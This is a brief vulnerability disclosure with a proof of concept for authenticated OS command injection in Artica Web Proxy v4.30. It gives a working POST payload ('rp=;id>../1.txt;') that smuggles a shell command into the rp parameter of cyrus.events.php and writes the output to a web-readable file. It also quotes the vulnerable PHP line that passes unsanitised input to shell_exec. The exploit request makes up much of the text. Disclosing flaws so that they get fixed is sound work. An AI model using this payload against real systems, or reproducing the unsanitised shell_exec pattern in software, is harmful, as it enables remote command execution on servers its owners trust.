Vendor && Product
Artica Web Proxy v4.30.000000
Download: http://www.articatech.com/download.php
Reproduction
Login the web account, use this poc
Because the execution result is not echoed, we view the result by writing a file
https://192.168.108.14:9000/cyrus.events.php?logs=
POST:
rp=;id>../1.txt;
access https://192.168.108.14:9000/1.txt, we can see the execution result.
OS Command Injection Analysis
The vulnerable file is in : cyrus.events.php, it receives a parameter logs and execute function logs()
In the function logs(), it receives another parameter rp with POST method, then take them to the file cyrus.php with ?cyrus-events=yes
In cyrus.php, cyrus-events corresponds to cyrus_events() which can execute os command through ;
$cmdline="$grep --binary-files=text -Ei \"$search\" /var/log/mail.log|$tail -n $rp >$logfile 2>&1";
...
shell_exec($cmdline);